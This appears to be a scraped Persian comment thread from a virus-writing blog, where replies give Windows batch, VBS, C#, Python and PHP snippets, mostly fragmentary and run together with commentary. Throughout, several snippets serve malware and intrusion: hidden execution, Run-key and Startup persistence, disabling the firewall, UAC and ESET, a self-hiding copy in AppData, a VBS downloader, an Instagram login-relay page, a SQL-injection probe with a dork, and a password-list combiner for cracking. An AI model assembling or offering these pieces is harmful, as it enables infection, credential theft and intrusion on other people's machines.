Netsh
DHCP
trace enableبرای غیر فعال کردنش هم
trace disableسوال دوم رو متوجه نشدم
@echo offکه اگه Pause رو از خط آخر پاک کنی موقع اجرا ، سی ام دی رو هم نشون نمیده (اونو نوشتم خودت ببینی اخطاری نداشته باشه بعد پاکش کنی)
CLS Netsh
CLS DHCP
CLS trace enable
Pause
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, Falseکدهای بالا رو با نام makhfi.vbs ذخیره میکنیم
wscript.exe "C:\makhfi.vbs" "C:\V32.bat"میتونیم بجای V32.bat هر برنامه ی دیگه ای رو هم بنویسیم مثلا V32.exe یا ...
RegistryKey registryKey = Registry.CurrentUser.OpenSubKeyکه در کدهای بالا کلید ریجستری از مسیر زیر استخراج شده
("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
registryKey.SetValue("Namebarname", Application.ExecutablePath);
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runویروس و کیلاگر نویسی به زبان سی شارپ رو بعدا مفصل کار میکنیم باهم :)
<a href="http://Virus32.blog.ir">متن</a>راستش کلا خوب متوجه منظورت نشدم
Awlie karet ! ... Edame bede ... ;)-
System.IO.File.Delete(nam);
بجای nam اسم و مسیر فایلت رو باید بدیSystem.IO.File.Delete(textBox1.Text);
string b;
System.IO.File.Delete(b);
System.Diagnostics.Process.Start(@"C:\Windows\System32\cmd.exe");
public void msok()حالا برای نمایش دادن این پیام در یه فرم دیگه ابتدا این صفحه رو باید در ابتدای کدها فراخوانی کنی
{
MessageBox.Show("ذخیره سازی انجام شد", "ذخیره",MessageBoxButtons.OK , MessageBoxIcon.Information);
}
public partial class darkhast : Formبعد در هرجای کدها میتونی به شکل زیر این پیام رو فراخوانی کنی
{
codd cd = new codd();
cd.msok();امیدوارم منظورتو درست متوجه شده باشم
Echo %random:~-1%
Echo %random:~-1%%random:~-1%%random:~-1%%random:~-1%
import time import socket print ("Coded By Mehran ( Khoshgeled by ViRus32 & MR_C0D3R :D )...") time.sleep(1) while True: URL = raw_input("Enter Your URL => ") IP = socket.gethostbyname(URL) print "\nYour Site IP => ",IP,"\n"با اندکی تغییرات
box-shadow: 0 0 20px rgb(0, 250, 250);اینم کدی که دنبالشی
<audio loop autoplay hidden>
<source src="http://LinkMusic.mp3" type="audio/mpeg">
</audio>
textBox1.PasswordChar = '*';
Color A
IPconfig /FlushDNS
IPEndPoint ipLocal = new IPEndPoint(IPAddress.Parse(127.0.0.1),3285);یا اینکه اگه آی پی و پورت مشخص نباشه میتونیم از کد پایین استفاده کنیم
IPEndPoint ipLocal = new IPEndPoint(IPAddress.Any, 3285 );بطور کلی میاد و یه اکسس پوینت تعریف میکنه دیگه ...
@NetSh AdvFirewall Set AllProfiles State Off
@NetSh AdvFirewall Set AllProfiles State On
@Powershell -C "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"
@Powershell -C "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled True"امیدوارم شما هم همیشه موفق باشید
using System.IO;
public partial class Form1 : Form {و تک خط کد پایین رو زیر پرانتز کد بالا قرار بده
List<string> PasswordList = new List<string>();حالا به کدهای رویداد دکمت برو و کدهای پایین رو بهش اضافه کن
OpenFileDialog dialog = new OpenFileDialog(); dialog.Filter = "Text Files|*.txt"; dialog.Title = "Open Password-List"; if (dialog.ShowDialog() == DialogResult.OK) { string[] a = File.ReadAllLines(dialog.FileName); this.PasswordList.AddRange(a); } foreach(string i in PasswordList) { MessageBox.Show(i); }حالا پروژتو کامپایل و اجرا کن
foreach(string i in PasswordList) { MessageBox.Show(i); }حالا میتونی تو کانفیگ کرکرت یا ...
using System.Diagnostics;
Process[] processes = Process.GetProcesses();
foreach (Process p in processes)
{
if (!String.IsNullOrEmpty(p.MainWindowTitle))
{
listBox1.Items.Add(p.MainWindowTitle);
}
}
OleDbConnection con = new OleDbConnection(@"provider=microsoft.jet.oledb.4.0; data source=|DataDirectory|data1.mdb ;Jet OLEDB:Database Password=123456;");یه بانک اکسس به اسم data1 یه تیبل به اسم member سه تا کلومن id,name,pass یه رمز خیلی خیلی قوی 123456 (به کسی نگو رمزو) درست کردم و این کد بالا رو برات نوشتم.
OleDbCommand com = new OleDbCommand();
string qq = "select * from member where name like '" + textBox1.Text + "' and pass like '" + textBox2.Text + "'";
com = new OleDbCommand(qq, con);
OleDbDataReader dr = com.ExecuteReader();
dr.Read();
if (dr.HasRows)
{
MessageBox.Show("خوش اومدی");
dr.Close();
return;
}
else
{
MessageBox.Show("داری اجتبا میزنی داداج");
}
echo y | Taskkill /im egui.exe
with open('1.txt', 'r') as f: word_1 = [line.strip() for line in f] with open('2.txt', 'r') as x: word_2 = [line.strip() for line in x] for i in word_1: for j in word_2: print(i+j)
python3 FileName.pyبرای اجرای کدهای پایتون دو هم نیازی نیست که بنویسیم پایتون2
python FileName.py
Attrib +H TrojanPath\TrojanName.Bat
using System.Net; using System.IO;حالا کد های پایین رو بزن توی رویداد دکمت
HttpWebRequest web = (HttpWebRequest)WebRequest.Create(textBox1.Text+'\'');
web.Method = "Get";
HttpWebResponse res = (HttpWebResponse)web.GetResponse();
string source = new StreamReader(res.GetResponseStream()).ReadToEnd();
////////////
if(source.Contains("SQL"))
{
MessageBox.Show("SQL ERROR !!!");
}
else
{
MessageBox.Show("NO SQL ERROR");
}
تست
WindowsMediaPlayer.URL = "C:\Users\Username\Desktop\test.mp3" WindowsMediaPlayer.settings.setMode "loop", True
Option Explicit Private Sub Form_Load()
'-------------------------------------------------------------------------
WindowsMediaPlayer.Visible = False WindowsMediaPlayer.URL = "C:\Users\Username\Desktop\Test.mp3" WindowsMediaPlayer.settings.setMode "loop", True
'-------------------------------------------------------------------------
End Sub
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /fراستیتش برای سوال دومت فکر نکنم بشه همچین کاری کرد ( من بلد نیستم)
<div class="main_menu"> <div class="cnt"> <box:menu> <ul> <view:menu> <li class="(*menu_item_selected*)"><a href="(*menu_item_link*)">(*menu_item_title*)</a><div class="pipe"></div></li> </view:menu> </ul> </box:menu> </div> </div>
************************************************************************************************************************************************************************************************************************************
Form1.Hideحالا روی دکمه ای که داخل فورم دوم گذاشتی دوبار کلیک کن و کدهای پایین رو داخلش قرار بده
Form2.Show
Form2.Hideبقیش هم بر میگرده به خودت که بیای و شرط بزاری که اگر مرحله بازی تموم شد برو تو ....
Form1.Show
IPconfigیا اینکه میتونیم اطلاعات بیشتری در بیاریم
IPconfig /Allیا اینکه میتونیم آی پی عمومی رو بدست بیاریم
NslookUp Myip.openDns.com Resolver1.OpenDns.com
site:VulnerableSite.Com inurl:.php?id=
Guided - use the largest continuous free space
@Echo off Color fc Mode 70,24 Cls FOR /L %%i IN (1,1,254) DO ping -n 1 192.168.10.%%i | FIND /i "Reply">>%UserProfile%\Desktop\EnableIP.txt Exit
https://www.instagram.com/accounts/login/?source=auth_switcher
@Echo off Title ViRus32 Color FC Mode 75,24 Cls Set /p input="Enter your value : Echo --{ %input% Pauseامیدوارم منظورت این باشه
@echo offالبته B من یکم زشت شد ولی ...
set /p input=Type a or b:
if %input%==a goto A ifnot goto D
if %input%==b goto B ifnot goto D
:D
echo.
title Goodbye
color 0c
cls
echo -----------------------
echo Virus32.blog.ir
echo -----------------------
ping localhost -n 3 >nul
echo -----------------------
echo Goodbye!
echo -----------------------
ping localhost -n 4 >nul
exit
:A
cls
echo.
echo *
echo ***
echo ** **
echo *******
echo ** **
echo ** **
echo.
pause
goto D
:B
cls
echo.
echo ******
echo ** **
echo ******
echo ** **
echo ** **
echo ******
echo.
pause
goto D
<html> <head> <title>ViRus32</title> </head> <body> <form method="post" action=""> Username : <input type="text" name="username"><br> Password : <input type="text" name="password"><br> Email-Address : <input type="text" name="email"><br> <input type="submit" value="Login"> </form> </body> </html>کدهای پی اچ پی
$username = $_POST['username']; $password = $_POST['password']; $email = $_POST['email']; $turbo = curl_init(); curl_setopt($turbo, CURLOPT_URL, "https://www.instagram.com/accounts/login/ajax/"); curl_setopt($turbo, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($turbo, CURLOPT_RETURNTRANSFER, 1); curl_setopt($turbo, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($turbo, CURLOPT_HTTPHEADER, array( 'Host: www.instagram.com', 'X-CSRFToken: EJMrAsTOEi1SKiZLHzNf2RMBEZTQkI9I', 'X-Instagram-AJAX: 1', 'X-Requested-With: XMLHttpRequest', 'Referer: https://www.instagram.com/', 'Cookie: csrftoken=EJMrAsTOEi1SKiZLHzNf2RMBEZTQkI9I;' )); curl_setopt($turbo, CURLOPT_POSTFIELDS, "username=$username&password=$password"); curl_setopt($turbo, CURLOPT_HEADER, 1); curl_setopt($turbo, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); $linked = curl_exec($turbo);این تا اینجای کار
Msg /Help
net send 10.32.52.64 "salam"
Me.WindowState = FormWindowState.Maximized
Net user %username% %random%فقط کاربران گرامی دقت کنین آقای Mozahem رو دعا کنن
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") dim bStrm: Set bStrm = createobject("Adodb.Stream") xHttp.Open "GET", "LinkDownload", False xHttp.Send with bStrm .type = 1 .open .write xHttp.responseBody .savetofile "MasireFile\FILE_NAME.EXT", 2 end withکه توی کدهای بالا به جای مسیر فایل و نام فایل که جلوی savetofile قرار دارن
Echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") > %UserProfile%\Downloader.vbs Echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> %UserProfile%\Downloader.vbsشاید برات سوال بشه که چرا برای خط اول از < استفاده کردیم اما برای خط دوم از <<
Shell:Startupبعد از اینکه وارد استارت آپ شدیم
Echo * Time: %Time% --- Date: %Date% * >> %UserProfile%\Desktop\Report.txtالبته این هم بعد از هر ری استارت داخل دسکتاپ ذخیره میکنه ...
Quick.Batch.File.Compilerالبته بازم میشه به کدها دست یافت
@echo off
cls && color 08
for /F "tokens=1,2 delims=#" %%a in ('"prompt #$H#$E# & echo on & for %%b in (1)
do rem"') do (set "DEL=%%a")
<nul set /p=""
echo.
call :PainText 01 "V"
call :PainText 02 "I"
call :PainText 03 "R"
call :PainText 04 "U"
call :PainText 05 "S"
call :PainText 05 "-"
call :PainText 06 "3"
call :PainText 07 "2"
echo.
goto :end
:PainText
<nul set /p "=%DEL%" > "%~2"
findstr /v /a:%1 /R "+" "%~2" nul
del "%~2" > nul
goto :eof
:end
echo.
pause
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
try
{
File.Copy(AppDomain.CurrentDomain.BaseDirectory + @"\virus-32.exe",
Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\virus-32.exe");
File.SetAttributes(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\virus-32.exe", FileAttributes.Hidden);
}
catch { }
Application.Run(new Form1());
Form1.ActiveForm.Opacity = 0;
Form1.ActiveForm.Opacity = 100;کد کار با فورم برای مخفی کردن و نمایش صفحه برنامت
this.Hide();
this.Show();گرفتی چیشد ؟
byte[] buffer = new byte[1048576];
string username = Environment.UserName;یعنی تا اینجای کار خیلی راحت خودت تونستی با سی شارپ یوزر و پسوورد رو در بیاری :)
using System.Net.Mail;
try { MailMessage mail = new MailMessage(); SmtpClient SmtpServer = new SmtpClient("smtp.gmail.com"); mail.From = new MailAddress("آدرس ایمیلت"); mail.To.Add("آدرس ایمیلت"); mail.Subject = "موضوع ایمیلت"; mail.Body = "متن بدنه ی ایمیلت که میتونه متغیر و ... باشه"; // System.Net.Mail.Attachment attachment; // attachment = new System.Net.Mail.Attachment(@"مسیر فایلت"); // mail.Attachments.Add(attachment); SmtpServer.Port = 587; SmtpServer.Credentials = new System.Net.NetworkCredential("username", "password_email"); SmtpServer.EnableSsl = true; SmtpServer.Send(mail); } catch (Exception ex) { Console.WriteLine(ex.ToString()); }تو کدهای بالا
ExitWindowsEx (EWX_POWEROFF | EWX_FORCEIFHUNG,SHTDN_REASON_MINOR_OTHER);
system("C:\\WINDOWS\\System32\\shutdown /s");
Process.Start("shutdown","/s /t 0");
Process.Start("shutdown", "-s -t 00")
import os
os.system('shutdown -s')
File.Delete(@"C:\ViRus32.txt");یا اینکه تو پایتون خودم اینجوری استفاده کردم
os.remove(i)البته i همون اسم متغیرم هستش که چون تو حلقه رووش جا به جا شدم اینجوری شده :)
start Powershellو جلوی پاورشل هم دستور پاور شل ...
ویروس میخواستم راجع به کد های پاپ آپ یکم توضیح بدین
اینکه چجوری و کجا بزاریم؟؟